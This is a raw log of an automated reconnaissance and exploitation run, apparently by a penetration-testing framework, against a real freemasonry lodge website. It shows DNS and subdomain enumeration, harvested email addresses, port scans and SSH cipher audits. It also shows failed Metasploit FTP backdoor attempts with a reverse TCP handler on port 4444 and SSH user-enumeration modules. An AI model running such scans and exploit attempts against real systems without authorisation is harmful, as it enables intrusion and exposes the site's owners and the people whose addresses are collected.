  668. dnsenum VERSION:1.2.4
  669.  
  670. -----   glmasonica.com   -----
  671.  
  672.  
  673. Host's addresses:
  674. __________________
  675.  
  676. glmasonica.com.                          11683    IN    A        192.252.149.45
  677.  
  678.  
  679. Wildcard detection using: nzifomoigzmu
  680. _______________________________________
  681.  
  682. nzifomoigzmu.glmasonica.com.             14400    IN    A        192.252.149.45
  683.  
  684.  
  685. !!!!!!!!!!!!!!!!!!!!!!!!!!!!
  686.  
  687.  Wildcards detected, all subdomains will point to the same IP address
  688.  Omitting results containing 192.252.149.45.
  689.  Maybe you are using OpenDNS servers.
  690.  
  691. !!!!!!!!!!!!!!!!!!!!!!!!!!!!
  692.  
  693.  
  694. Name Servers:
  695. ______________
  696.  
  697. ns2.server308.com.                       12328    IN    A        192.252.150.21
  698. ns1.server308.com.                       12329    IN    A        192.252.149.21
  699.  
  700.  
  701. Mail (MX) Servers:
  702. ___________________
  703.  
  704. mail.glmasonica.com.                     12352    IN    A        192.252.149.45
  705.  
  706.  
  707. Trying Zone Transfers and getting Bind Versions:
  708. _________________________________________________
  709.  
  710.  
  711. Trying Zone Transfer for glmasonica.com on ns2.server308.com ...
  712.  
  713. Trying Zone Transfer for glmasonica.com on ns1.server308.com ...
  714.  
  715. brute force file not specified, bay.
  716. ######################################################################################################################################
  717. [-] Enumerating subdomains now for glmasonica.com
  718. [-] verbosity is enabled, will show the subdomains results in realtime
  719. [-] Searching now in Baidu..
  720. [-] Searching now in Yahoo..
  721. [-] Searching now in Google..
  722. [-] Searching now in Bing..
  723. [-] Searching now in Ask..
  724. [-] Searching now in Netcraft..
  725. [-] Searching now in DNSdumpster..
  726. [-] Searching now in Virustotal..
  727. [-] Searching now in ThreatCrowd..
  728. [-] Searching now in SSL Certificates..
  729. [-] Searching now in PassiveDNS..
  730. Virustotal: mail.glmasonica.com
  731. Virustotal: www.glmasonica.com
  732. DNSdumpster: mail.glmasonica.com
  733. Yahoo: www.glmasonica.com
  734. [-] Saving results to file: /usr/share/sniper/loot/glmasonica.com/domains/domains-glmasonica.com.txt
  735. [-] Total Unique Subdomains Found: 2
  736. www.glmasonica.com
  737. mail.glmasonica.com
  738. #######################################################################################################################################
  739.                            __
  740.   ____ _____ ___  ______ _/ /_____  ____  ___
  741.  / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  742. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
  743. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  744.         /_/  discover v0.5.0 - by @michenriksen
  745.  
  746. Identifying nameservers for glmasonica.com... Done
  747. Using nameservers:
  748.  
  749.  - 192.252.149.21
  750.  - 192.252.150.21
  751.  
  752. Checking for wildcard DNS... Wildcard detected!
  753. Identifying wildcard IPs... Done
  754. Filtering out hosts resolving to wildcard IPs
  755.  
  756. Running collector: HackerTarget... Done (1 host)
  757. Running collector: Shodan... Skipped
  758.  -> Key 'shodan' has not been set
  759. Running collector: Wayback Machine... Done (2 hosts)
  760. Running collector: Riddler... Skipped
  761.  -> Key 'riddler_username' has not been set
  762. Running collector: Certificate Search... Done (0 hosts)
  763. Running collector: Google Transparency Report... Done (0 hosts)
  764. Running collector: PTRArchive... Error
  765.  -> PTRArchive returned unexpected response code: 502
  766. Running collector: Censys... Skipped
  767.  -> Key 'censys_secret' has not been set
  768. Running collector: PassiveTotal... Skipped
  769.  -> Key 'passivetotal_key' has not been set
  770. Running collector: VirusTotal... Skipped
  771.  -> Key 'virustotal' has not been set
  772. Running collector: Netcraft... Done (0 hosts)
  773. Running collector: Threat Crowd... Done (0 hosts)
  774. Running collector: Dictionary... Done (26 hosts)
  775. Running collector: PublicWWW... Done (2 hosts)
  776. Running collector: DNSDB... Done (2 hosts)
  777.  
  778. Resolving 30 unique hosts...
  779.  
  780.  
  781. Wrote 0 hosts to:
  782.  
  783.  - file:///root/aquatone/glmasonica.com/hosts.txt
  784.  - file:///root/aquatone/glmasonica.com/hosts.json
  785.                            __
  786.   ____ _____ ___  ______ _/ /_____  ____  ___
  787.  / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  788. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
  789. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  790.         /_/  takeover v0.5.0 - by @michenriksen
  791.  
  792. Loaded 0 hosts from /root/aquatone/glmasonica.com/hosts.json
  793. Loaded 25 domain takeover detectors
  794.  
  795. Identifying nameservers for glmasonica.com... Done
  796. Using nameservers:
  797.  
  798.  - 192.252.150.21
  799.  - 192.252.149.21
  800.  
  801. Checking hosts for domain takeover vulnerabilities...
  802.  
  803. Finished checking hosts:
  804.  
  805.  - Vulnerable     : 0
  806.  - Not Vulnerable : 0
  807.  
  808. Wrote 0 potential subdomain takeovers to:
  809.  
  810.  - file:///root/aquatone/glmasonica.com/takeovers.json
  811.  
  812.                            __
  813.   ____ _____ ___  ______ _/ /_____  ____  ___
  814.  / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  815. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
  816. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  817.         /_/  scan v0.5.0 - by @michenriksen
  818.  
  819. Loaded 0 hosts from /root/aquatone/glmasonica.com/hosts.json
  820.  
  821. Probing 0 ports...
  822.  
  823. Wrote open ports to file:///root/aquatone/glmasonica.com/open_ports.txt
  824. Wrote URLs to file:///root/aquatone/glmasonica.com/urls.txt
  825.                            __
  826.   ____ _____ ___  ______ _/ /_____  ____  ___
  827.  / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  828. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
  829. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  830.         /_/  gather v0.5.0 - by @michenriksen
  831.  
  832. Processing 0 pages...
  833.  
  834. Finished processing pages:
  835.  
  836.  - Successful : 0
  837.  - Failed     : 0
  838.  
  839. Generating report...done
  840. Report pages generated:
  841. #######################################################################################################################################
  842.  
  843. [+] Emails found:
  844. --------------------------------------------------------------------------------------------------------------------------------------
  845. No emails found
  846.  
  847. [+] Hosts found in search engines:
  848. ---------------------------------------------------------------------------------------------------------------------------------------
  849. [-] Resolving hostnames IPs...
  850. 192.252.149.45:www.glmasonica.com
  851. [+] Virtual hosts:
  852. =======================================================================================================================================
  853. 192.252.149.45  puvesapuertas.com
  854. 192.252.149.45  www.glmasonica.com
  855. 192.252.149.45  www.careaction.org.hk
  856. 192.252.149.45  www.fivethousandyears.org
  857. 192.252.149.45  www.puvesapuertas.com
  858. 192.252.149.45  www.mexicanadelubricantes.com.mx
  859. 192.252.149.45  careaction.org.hk
  860.  
  861.  
  862.  
  863. [+] List of e-mails found:
  864. ----------------------------
  865. glmasonica@intnet.mu
  866. sales@icmauritius.com
  867. info@sakoa
  868. info@sakoa
  869. sales@icmauritius.com
  870.  
  871. #######################################################################################################################################
  872. PING glmasonica.com (192.252.149.45) 56(84) bytes of data.
  873. 64 bytes from 192.252.149.45 (192.252.149.45): icmp_seq=1 ttl=44 time=451 ms
  874.  
  875. --- glmasonica.com ping statistics ---
  876. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  877. rtt min/avg/max/mdev = 451.921/451.921/451.921/0.000 ms
  878.  
  879. #######################################################################################################################################
  880. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:35 EDT
  881. Nmap scan report for glmasonica.com (192.252.149.45)
  882. Host is up (0.77s latency).
  883. Not shown: 460 closed ports, 6 filtered ports
  884. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  885. PORT     STATE SERVICE
  886. 21/tcp   open  ftp
  887. 22/tcp   open  ssh
  888. 80/tcp   open  http
  889. 110/tcp  open  pop3
  890. 143/tcp  open  imap
  891. 443/tcp  open  https
  892. 587/tcp  open  submission
  893. 993/tcp  open  imaps
  894. 995/tcp  open  pop3s
  895. 3306/tcp open  mysql
  896.  
  897. Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds
  898. #######################################################################################################################################
  899. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:36 EDT
  900. Nmap scan report for glmasonica.com (192.252.149.45)
  901. Host is up.
  902.  
  903. PORT     STATE         SERVICE
  904. 53/udp   open|filtered domain
  905. 67/udp   open|filtered dhcps
  906. 68/udp   open|filtered dhcpc
  907. 69/udp   open|filtered tftp
  908. 88/udp   open|filtered kerberos-sec
  909. 123/udp  open|filtered ntp
  910. 137/udp  open|filtered netbios-ns
  911. 138/udp  open|filtered netbios-dgm
  912. 139/udp  open|filtered netbios-ssn
  913. 161/udp  open|filtered snmp
  914. 162/udp  open|filtered snmptrap
  915. 389/udp  open|filtered ldap
  916. 520/udp  open|filtered route
  917. 2049/udp open|filtered nfs
  918.  
  919. Nmap done: 1 IP address (1 host up) scanned in 3.42 seconds
  920. #######################################################################################################################################
  921.  + -- --=[Port 21 opened... running tests...
  922. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:36 EDT
  923. Nmap scan report for glmasonica.com (192.252.149.45)
  924. Host is up (0.20s latency).
  925.  
  926. PORT   STATE    SERVICE VERSION
  927. 21/tcp filtered ftp
  928. Too many fingerprints match this host to give specific OS details
  929.  
  930. TRACEROUTE (using proto 1/icmp)
  931. HOP RTT    ADDRESS
  932. 1   ... 30
  933.  
  934. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  935. Nmap done: 1 IP address (1 host up) scanned in 15.96 seconds
  936.   +-------------------------------------------------------+
  937.   |  METASPLOIT by Rapid7                                 |
  938.   +---------------------------+---------------------------+
  939.   |      __________________   |                           |
  940.   |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  941.   |             )=\           | |  EXPLOIT   \            |
  942.   |            // \\          | |_____________\_______    |
  943.   |           //   \\         | |==[msf >]============\   |
  944.   |          //     \\        | |______________________\  |
  945.   |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  946.   |        //         \\      |  *********************    |
  947.   +---------------------------+---------------------------+
  948.   |      o O o                |        \'\/\/\/'/         |
  949.   |              o O          |         )======(          |
  950.   |                 o         |       .'  LOOT  '.        |
  951.   | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  952.   | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  953.   | |________________|__|)__| |    |     __||_)     |     |
  954.   | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  955.   |  = = = = = = = = = = = =  |     '--------------'      |
  956.   +---------------------------+---------------------------+
  957.  
  958.  
  959.        =[ metasploit v4.16.49-dev                         ]
  960. + -- --=[ 1750 exploits - 1003 auxiliary - 304 post       ]
  961. + -- --=[ 536 payloads - 40 encoders - 10 nops            ]
  962. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  963.  
  964. RHOST => glmasonica.com
  965. RHOSTS => glmasonica.com
  966. [-] glmasonica.com:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (glmasonica.com:21).
  967. [*] Exploit completed, but no session was created.
  968. [*] Started reverse TCP double handler on 10.211.1.21:4444
  969. [*] glmasonica.com:21 - Sending Backdoor Command
  970. [-] glmasonica.com:21 - Not backdoored
  971. [*] Exploit completed, but no session was created.
  972.  + -- --=[Port 22 opened... running tests...
  973. # general
  974. (gen) banner: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u3
  975. (gen) software: OpenSSH 7.4p1
  976. (gen) compatibility: OpenSSH 7.3+, Dropbear SSH 2016.73+
  977. (gen) compression: enabled (zlib@openssh.com)
  978.  
  979. # key exchange algorithms
  980. (kex) curve25519-sha256                     -- [warn] unknown algorithm
  981. (kex) curve25519-sha256@libssh.org          -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
  982. (kex) ecdh-sha2-nistp256                    -- [fail] using weak elliptic curves
  983.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  984. (kex) ecdh-sha2-nistp384                    -- [fail] using weak elliptic curves
  985.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  986. (kex) ecdh-sha2-nistp521                    -- [fail] using weak elliptic curves
  987.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  988. (kex) diffie-hellman-group-exchange-sha256  -- [warn] using custom size modulus (possibly weak)
  989.                                             `- [info] available since OpenSSH 4.4
  990. (kex) diffie-hellman-group16-sha512         -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
  991. (kex) diffie-hellman-group18-sha512         -- [info] available since OpenSSH 7.3
  992. (kex) diffie-hellman-group14-sha256         -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
  993. (kex) diffie-hellman-group14-sha1           -- [warn] using weak hashing algorithm
  994.                                             `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  995.  
  996. # host-key algorithms
  997. (key) ssh-rsa                               -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  998. (key) rsa-sha2-512                          -- [info] available since OpenSSH 7.2
  999. (key) rsa-sha2-256                          -- [info] available since OpenSSH 7.2
  1000. (key) ecdsa-sha2-nistp256                   -- [fail] using weak elliptic curves
  1001.                                             `- [warn] using weak random number generator could reveal the key
  1002.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  1003. (key) ssh-ed25519                           -- [info] available since OpenSSH 6.5
  1004.  
  1005. # encryption algorithms (ciphers)
  1006. (enc) chacha20-poly1305@openssh.com         -- [info] available since OpenSSH 6.5
  1007.                                             `- [info] default cipher since OpenSSH 6.9.
  1008. (enc) aes128-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  1009. (enc) aes192-ctr                            -- [info] available since OpenSSH 3.7
  1010. (enc) aes256-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  1011. (enc) aes128-gcm@openssh.com                -- [info] available since OpenSSH 6.2
  1012. (enc) aes256-gcm@openssh.com                -- [info] available since OpenSSH 6.2
  1013.  
  1014. # message authentication code algorithms
  1015. (mac) umac-64-etm@openssh.com               -- [warn] using small 64-bit tag size
  1016.                                             `- [info] available since OpenSSH 6.2
  1017. (mac) umac-128-etm@openssh.com              -- [info] available since OpenSSH 6.2
  1018. (mac) hmac-sha2-256-etm@openssh.com         -- [info] available since OpenSSH 6.2
  1019. (mac) hmac-sha2-512-etm@openssh.com         -- [info] available since OpenSSH 6.2
  1020. (mac) hmac-sha1-etm@openssh.com             -- [warn] using weak hashing algorithm
  1021.                                             `- [info] available since OpenSSH 6.2
  1022. (mac) umac-64@openssh.com                   -- [warn] using encrypt-and-MAC mode
  1023.                                             `- [warn] using small 64-bit tag size
  1024.                                             `- [info] available since OpenSSH 4.7
  1025. (mac) umac-128@openssh.com                  -- [warn] using encrypt-and-MAC mode
  1026.                                             `- [info] available since OpenSSH 6.2
  1027. (mac) hmac-sha2-256                         -- [warn] using encrypt-and-MAC mode
  1028.                                             `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  1029. (mac) hmac-sha2-512                         -- [warn] using encrypt-and-MAC mode
  1030.                                             `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  1031. (mac) hmac-sha1                             -- [warn] using encrypt-and-MAC mode
  1032.                                             `- [warn] using weak hashing algorithm
  1033.                                             `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  1034.  
  1035. # algorithm recommendations (for OpenSSH 7.4)
  1036. (rec) -ecdh-sha2-nistp521                   -- kex algorithm to remove
  1037. (rec) -ecdh-sha2-nistp384                   -- kex algorithm to remove
  1038. (rec) -diffie-hellman-group14-sha1          -- kex algorithm to remove
  1039. (rec) -ecdh-sha2-nistp256                   -- kex algorithm to remove
  1040. (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
  1041. (rec) -ecdsa-sha2-nistp256                  -- key algorithm to remove
  1042. (rec) -hmac-sha2-512                        -- mac algorithm to remove
  1043. (rec) -umac-128@openssh.com                 -- mac algorithm to remove
  1044. (rec) -hmac-sha2-256                        -- mac algorithm to remove
  1045. (rec) -umac-64@openssh.com                  -- mac algorithm to remove
  1046. (rec) -hmac-sha1                            -- mac algorithm to remove
  1047. (rec) -hmac-sha1-etm@openssh.com            -- mac algorithm to remove
  1048. (rec) -umac-64-etm@openssh.com              -- mac algorithm to remove
  1049.  
  1050. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:37 EDT
  1051. Nmap scan report for glmasonica.com (192.252.149.45)
  1052. Host is up (0.35s latency).
  1053.  
  1054. PORT   STATE SERVICE VERSION
  1055. 22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
  1056. |_ssh-auth-methods: ERROR: Script execution failed (use -d to debug)
  1057. |_ssh-brute: ERROR: Script execution failed (use -d to debug)
  1058. | ssh-hostkey:
  1059. |   2048 92:e0:eb:16:64:35:7a:26:99:37:fb:a5:d0:9f:75:9e (RSA)
  1060. |_  256 33:25:93:99:9b:e4:22:61:af:25:6b:58:67:a7:29:f9 (ED25519)
  1061. |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
  1062. |_ssh-run: ERROR: Script execution failed (use -d to debug)
  1063. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1064. Device type: specialized|WAP
  1065. Running: iPXE 1.X, Linux 2.4.X|2.6.X
  1066. OS CPE: cpe:/o:ipxe:ipxe:1.0.0%2b cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22
  1067. OS details: iPXE 1.0.0+, Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22)
  1068. Network Distance: 1 hop
  1069. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  1070.  
  1071. TRACEROUTE (using port 22/tcp)
  1072. HOP RTT        ADDRESS
  1073. 1   5601.55 ms 192.252.149.45
  1074.  
  1075. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1076. Nmap done: 1 IP address (1 host up) scanned in 121.78 seconds
  1077.  
  1078.   Metasploit Park, System Security Interface
  1079.   Version 4.0.5, Alpha E
  1080.   Ready...
  1081.   > access security
  1082.   access: PERMISSION DENIED.
  1083.   > access security grid
  1084.   access: PERMISSION DENIED.
  1085.   > access main security grid
  1086.   access: PERMISSION DENIED....and...
  1087.   YOU DIDN'T SAY THE MAGIC WORD!
  1088.   YOU DIDN'T SAY THE MAGIC WORD!
  1089.   YOU DIDN'T SAY THE MAGIC WORD!
  1090.   YOU DIDN'T SAY THE MAGIC WORD!
  1091.   YOU DIDN'T SAY THE MAGIC WORD!
  1092.   YOU DIDN'T SAY THE MAGIC WORD!
  1093.   YOU DIDN'T SAY THE MAGIC WORD!
  1094.  
  1095.  
  1096.        =[ metasploit v4.16.49-dev                         ]
  1097. + -- --=[ 1750 exploits - 1003 auxiliary - 304 post       ]
  1098. + -- --=[ 536 payloads - 40 encoders - 10 nops            ]
  1099. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  1100.  
  1101. USER_FILE => /BruteX/wordlists/simple-users.txt
  1102. RHOSTS => glmasonica.com
  1103. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  1104. RHOST => glmasonica.com
  1105. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
  1106. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
  1107. [*] glmasonica.com:22     - Scanned 1 of 1 hosts (100% complete)
  1108. [*] Auxiliary module execution completed
  1109.  + -- --=[Port 23 closed... skipping.
  1110.  + -- --=[Port 25 closed... skipping.
  1111.  + -- --=[Port 53 closed... skipping.
  1112.  + -- --=[Port 67 closed... skipping.
  1113.  + -- --=[Port 68 closed... skipping.
  1114.  + -- --=[Port 69 closed... skipping.
  1115.  + -- --=[Port 79 closed... skipping.
  1116.  + -- --=[Port 80 opened... running tests...
  1117. #######################################################################################################################################
  1118.  
  1119. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  1120. + -- --=[Target: glmasonica.com:80
  1121. + -- --=[Site not vulnerable to Cross-Site Tracing!
  1122. + -- --=[Site not vulnerable to Host Header Injection!
  1123. + -- --=[Site vulnerable to Cross-Frame Scripting!
  1124. + -- --=[Site vulnerable to Clickjacking!
  1125.  
  1126. HTTP/1.1 400 Bad Request
  1127. Date: Mon, 16 Apr 2018 02:40:14 GMT
  1128. Server: Apache
  1129. Content-Length: 226
  1130. Connection: close
  1131. Content-Type: text/html; charset=iso-8859-1
  1132.  
  1133. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1134. <html><head>
  1135. <title>400 Bad Request</title>
  1136. </head><body>
  1137. <h1>Bad Request</h1>
  1138. <p>Your browser sent a request that this server could not understand.<br />
  1139. </p>
  1140. </body></html>
  1141.  
  1142. HTTP/1.1 400 Bad Request
  1143. Date: Mon, 16 Apr 2018 02:40:16 GMT
  1144. Server: Apache
  1145. Content-Length: 226
  1146. Connection: close
  1147. Content-Type: text/html; charset=iso-8859-1
  1148.  
  1149. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1150. <html><head>
  1151. <title>400 Bad Request</title>
  1152. </head><body>
  1153. <h1>Bad Request</h1>
  1154. <p>Your browser sent a request that this server could not understand.<br />
  1155. </p>
  1156. </body></html>
  1157. #######################################################################################################################################
  1158. + -- --=[Checking if X-Content options are enabled on glmasonica.com...
  1159.  
  1160. + -- --=[Checking if X-Frame options are enabled on glmasonica.com...
  1161.  
  1162. + -- --=[Checking if X-XSS-Protection header is enabled on glmasonica.com...
  1163.  
  1164. + -- --=[Checking HTTP methods on glmasonica.com...
  1165.  
  1166. + -- --=[Checking if TRACE method is enabled on glmasonica.com...
  1167.  
  1168. + -- --=[Checking for META tags on glmasonica.com...
  1169. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  1170. <meta name="Keywords" content="" />
  1171. <meta name="Description" content="" />
  1172.  
  1173. + -- --=[Checking for open proxy on glmasonica.com...
  1174. <body>
  1175.     <div id="notice">
  1176.         <h1>RESOURCE NOT FOUND</h1>
  1177.         <h2><b>google.com</b></h2>
  1178.     </div>
  1179.     <div>
  1180.         server308.com: No site configured at this address.
  1181.     </div>
  1182. </body>
  1183. </html>
  1184.  
  1185. + -- --=[Enumerating software on glmasonica.com...
  1186. Server: Apache
  1187.  
  1188. + -- --=[Checking if Strict-Transport-Security is enabled on glmasonica.com...
  1189.  
  1190. + -- --=[Checking for Flash cross-domain policy on glmasonica.com...
  1191. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1192. <html><head>
  1193. <title>404 Not Found</title>
  1194. </head><body>
  1195. <h1>Not Found</h1>
  1196. <p>The requested URL /crossdomain.xml was not found on this server.</p>
  1197. <p>Additionally, a 404 Not Found
  1198. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1199. </body></html>
  1200.  
  1201. + -- --=[Checking for Silverlight cross-domain policy on glmasonica.com...
  1202. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1203. <html><head>
  1204. <title>404 Not Found</title>
  1205. </head><body>
  1206. <h1>Not Found</h1>
  1207. <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
  1208. <p>Additionally, a 404 Not Found
  1209. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1210. </body></html>
  1211.  
  1212. + -- --=[Checking for HTML5 cross-origin resource sharing on glmasonica.com...
  1213.  
  1214. + -- --=[Retrieving robots.txt on glmasonica.com...
  1215. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1216. <html><head>
  1217. <title>404 Not Found</title>
  1218. </head><body>
  1219. <h1>Not Found</h1>
  1220. <p>The requested URL /robots.txt was not found on this server.</p>
  1221. <p>Additionally, a 404 Not Found
  1222. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1223. </body></html>
  1224.  
  1225. + -- --=[Retrieving sitemap.xml on glmasonica.com...
  1226. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1227. <html><head>
  1228. <title>404 Not Found</title>
  1229. </head><body>
  1230. <h1>Not Found</h1>
  1231. <p>The requested URL /sitemap.xml was not found on this server.</p>
  1232. <p>Additionally, a 404 Not Found
  1233. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1234. </body></html>
  1235.  
  1236. + -- --=[Checking cookie attributes on glmasonica.com...
  1237. Set-Cookie: projector=949fea65f1db43f2b5c0369ddc79c6a6; path=/
  1238.  
  1239. + -- --=[Checking for ASP.NET Detailed Errors on glmasonica.com...
  1240. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1241. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1242.  
  1243.  
  1244. #######################################################################################################################################
  1245.  
  1246.     _____  .701F. .iBR.   .7CL. .70BR.   .7BR. .7BR'''Cq.   .70BR.      .1BR'''Yp, .8BR'''Cq.  
  1247.    (_____)   01     01N.    C     01       C     01   .01.    01          01    Yb   01   .01.
  1248.    (() ())   01     C YCb   C     01       C     01   ,C9     01          01    dP   01   ,C9  
  1249.     \   /    01     C  .CN. C     01       C     0101dC9      01          01'''bg.   0101dC9  
  1250.      \ /     01     C   .01.C     01       C     01  YC.      01      ,   01    .Y   01  YC.  
  1251.      /=\     01     C     Y01     YC.     ,C     01   .Cb.    01     ,C   01    ,9   01   .Cb.
  1252.     [___]  .J01L. .JCL.    YC      .b0101d'.   .J01L. .J01. .J01010101C .J0101Cd9  .J01L. .J01./ 2.1
  1253.  
  1254.  
  1255. ------------------------------------------------------------------------------------------------------------------------
  1256.  
  1257. [ ! ] Starting SCANNER INURLBR 2.1 at [15-04-2018 22:41:29]
  1258. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1259. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1260. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1261.  
  1262. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-glmasonica.com.txt  ]
  1263. [ INFO ][ DORK ]::[ site:glmasonica.com ]
  1264. [ INFO ][ SEARCHING ]:: {
  1265. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.sk ]
  1266.  
  1267. [ INFO ][ SEARCHING ]::
  1268. -[:::]
  1269. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1270.  
  1271. [ INFO ][ SEARCHING ]::
  1272. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1273. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.sa ID: 007843865286850066037:b0heuatvay8 ]
  1274.  
  1275. [ INFO ][ SEARCHING ]::
  1276. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1277.  
  1278. [ INFO ][ TOTAL FOUND VALUES ]:: [ 13 ]
  1279.  
  1280.  
  1281.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1282. |_[ + ] [ 0 / 13 ]-[22:41:51] [ - ]
  1283. |_[ + ] Target:: [ http://www.glmasonica.com/ ]
  1284. |_[ + ] Exploit::
  1285. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1286. |_[ + ] More details::  / -  / , ISP:
  1287. |_[ + ] Found:: UNIDENTIFIED
  1288.  
  1289.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1290. |_[ + ] [ 1 / 13 ]-[22:41:53] [ - ]
  1291. |_[ + ] Target:: [ http://www.glmasonica.com/introduction.php?l=en ]
  1292. |_[ + ] Exploit::
  1293. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1294. |_[ + ] More details::  / -  / , ISP:
  1295. |_[ + ] Found:: UNIDENTIFIED
  1296.  
  1297.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1298. |_[ + ] [ 2 / 13 ]-[22:41:56] [ - ]
  1299. |_[ + ] Target:: [ http://www.glmasonica.com/history_freemasonry.php?l=fr ]
  1300. |_[ + ] Exploit::
  1301. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1302. |_[ + ] More details::  / -  / , ISP:
  1303. |_[ + ] Found:: UNIDENTIFIED
  1304.  
  1305.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1306. |_[ + ] [ 3 / 13 ]-[22:42:01] [ - ]
  1307. |_[ + ] Target:: [ http://glmasonica.com/display/files/programme.pdf ]
  1308. |_[ + ] Exploit::
  1309. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1310. |_[ + ] More details::  / -  / , ISP:
  1311. |_[ + ] Found:: UNIDENTIFIED
  1312.  
  1313.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1314. |_[ + ] [ 4 / 13 ]-[22:42:04] [ - ]
  1315. |_[ + ] Target:: [ http://www.glmasonica.com/faq.php?l=fr ]
  1316. |_[ + ] Exploit::
  1317. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1318. |_[ + ] More details::  / -  / , ISP:
  1319. |_[ + ] Found:: UNIDENTIFIED
  1320.  
  1321.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1322. |_[ + ] [ 5 / 13 ]-[22:42:06] [ - ]
  1323. |_[ + ] Target:: [ http://www.glmasonica.com/history_glm.php?l=fr ]
  1324. |_[ + ] Exploit::
